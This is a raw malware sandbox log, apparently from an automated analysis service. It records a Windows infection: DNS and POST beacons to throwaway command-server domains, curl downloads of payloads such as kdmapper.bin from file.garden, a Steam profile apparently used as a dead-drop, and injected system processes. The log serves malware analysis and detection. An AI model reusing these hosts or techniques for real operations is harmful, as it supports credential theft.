                                Source: unknownDNS traffic detected: query: delaylacedmn.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: writekdmsnu.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: bellykmrebk.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: commandejorsk.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: zelensky.top replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: famikyjdiag.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: possiwreeste.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: agentyanlark.site replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: explorationmsn.store
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A9517EC0 InternetOpenA,?_Random_device@std@@YAIXZ,_Query_perf_frequency,_Query_perf_counter,log,cos,sin,exp,pow,tan,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,InternetOpenUrlA,InternetReadFile,memcpy,memset,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,28_2_00007FF6A9517EC0
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/1/imxyvi.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/build.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=db1d43d614fdfcd029bd4655; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34678Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 30 Sep 2024 16:20:27 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' equals www.youtube.com (Youtube)
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: static.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: file.garden
                                Source: global trafficDNS traffic detected: DNS query: tiddymarktwo.shop
                                Source: global trafficDNS traffic detected: DNS query: surveriysiop.shop
                                Source: global trafficDNS traffic detected: DNS query: captainynfanw.shop
                                Source: global trafficDNS traffic detected: DNS query: tearrybyiwo.shop
                                Source: global trafficDNS traffic detected: DNS query: appleboltelwk.shop
                                Source: global trafficDNS traffic detected: DNS query: tendencerangej.shop
                                Source: global trafficDNS traffic detected: DNS query: fossillargeiw.shop
                                Source: global trafficDNS traffic detected: DNS query: coursedonnyre.shop
                                Source: global trafficDNS traffic detected: DNS query: strappystyio.shop
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: offeviablwke.site
                                Source: global trafficDNS traffic detected: DNS query: explorationmsn.store
                                Source: global trafficDNS traffic detected: DNS query: famikyjdiag.site
                                Source: global trafficDNS traffic detected: DNS query: possiwreeste.site
                                Source: global trafficDNS traffic detected: DNS query: commandejorsk.site
                                Source: global trafficDNS traffic detected: DNS query: underlinemdsj.site
                                Source: global trafficDNS traffic detected: DNS query: bellykmrebk.site
                                Source: global trafficDNS traffic detected: DNS query: agentyanlark.site
                                Source: global trafficDNS traffic detected: DNS query: writekdmsnu.site
                                Source: global trafficDNS traffic detected: DNS query: delaylacedmn.site
                                Source: global trafficDNS traffic detected: DNS query: zelensky.top
                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: Amcache.hve.46.drString found in binary or memory: http://upx.sf.net
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agentyanlark.site/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                Source: aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/api
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/api$
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/api2
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/apii
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/l1
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bellykmrebk.site/t1
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akam
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://commandejorsk.site/L1_
                                Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://commandejorsk.site/apis
                                Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                                Source: RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/ima
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                                Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
